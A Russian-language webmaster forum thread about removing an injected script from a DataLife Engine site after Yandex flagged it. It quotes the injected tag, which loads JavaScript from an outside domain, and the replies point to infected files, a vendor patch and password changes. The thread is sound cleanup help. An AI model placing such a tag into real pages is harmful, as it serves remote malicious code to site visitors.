Вирус в header

[mixmix]

Доброе всем утро! Сегодня яндекс прислал письмишко...На страницах вашего сайта обнаружен код, который может быть опасен для посетителей. открыв ихсодный код увидел это <script type="text/javascript" src="http://up.bot.nu/go/314"></script>прописаный в header, а где его редактировать не пойму

 

[AlexVerb]

mixmix,Если я правильно тебя понял, смотри файл main.tpl в папке с шаблоном.

 

[mixmix]

нет, не правильно {header} именно это надо редактировать в шаблонах этого кода нет

 

[Deleted User]

Цитата: mixmix{header}а не {headers} ?В шаблоне он должен быть, но прописан может быть в javascript.

 

[mixmix]

ношёл код в index.php удалил не помогло, значит ещё где то есть

 

[LiTe116]

сайт в лс, уже сталкивался с этим.

 

[mixmix]

а он случаем в базе данных не прописывается а то мне проще снести двиг и поставить новый

 

[LiTe116]

смотря где ты скачивал двиг этот

 

[mixmix]

на рипсе, у меня ещё есть сайты с таким же двигом но там нет этого

 

[LiTe116]

советую тебе попробовать так, скачай двиг отсюда желательно 9.7. И попробуй поставить этот же шаблон, и посмотреть есть ли этот код там.если вирус найдется такой же, значит все дело в шаблоне.

 

[mixmix]

шаблон сменил он и в новом шаблоне отображается, это в двиге где тоо, у меня же есть сохранёная копия сайта без этих кодов, сейчас её восстановлю и посмотрю

 

[Dellok]

mixmix,сравни файлы с сайта и файлы из коробки.

 

[mixmix]

Dellok,Я уже снёс, и заменил старыми, теперь этого нет, сейчас ещё двиг обновлю до 9,8 чтобы эти дыры закрытьТему можно закрывать, всем кто помогал спасибо!

 

[Deleted User]

Пароли ещё от фтп и MySQL поменяй на всяк случай.И вобще не рекомендую нуллы DLE и шаблоны из не проверенных источников.

 

[ADM]

{headers}формируется же в engine/engine.phpтам и посмотри

 

[Dangeros]

/engine/data/dbconfig.php в конце прописан код,удаляй.

 

[Yamakasi]

просто, чтобы те кто попал на это, чтобы поняли что делать и где искать, вот оно: http://skripters.biz/forum/topic_52895#post-494148

 

[Adromeda72]

Всем привет!Недавно точно такая беда была на нескольких сайтов, думал хостинг виноват.Даже не мог понять откуда он подгружается скрипт, и где искать вообще. Движок DLE, проверил практически все, так и не нашел, где он спрятан.Что самое интересное то, что он исчезает после того как зарегистрироваться на сайте, т.е. для обычных посетителей этот код отображается.На 2-й день нашел решение, заменил templates.class.php.Недостаточная фильтрация данных в парсере шаблоновДля исправления скачайте и скопируйте на свой сервер патч: http://dle-news.ru/files/dle97_path_2.zip, данный патч предназначен для всех версий скрипта. Решение проблемы на 100% мне помогло.

 

[Yamakasi]

также вот ещё мануальчик!Цык!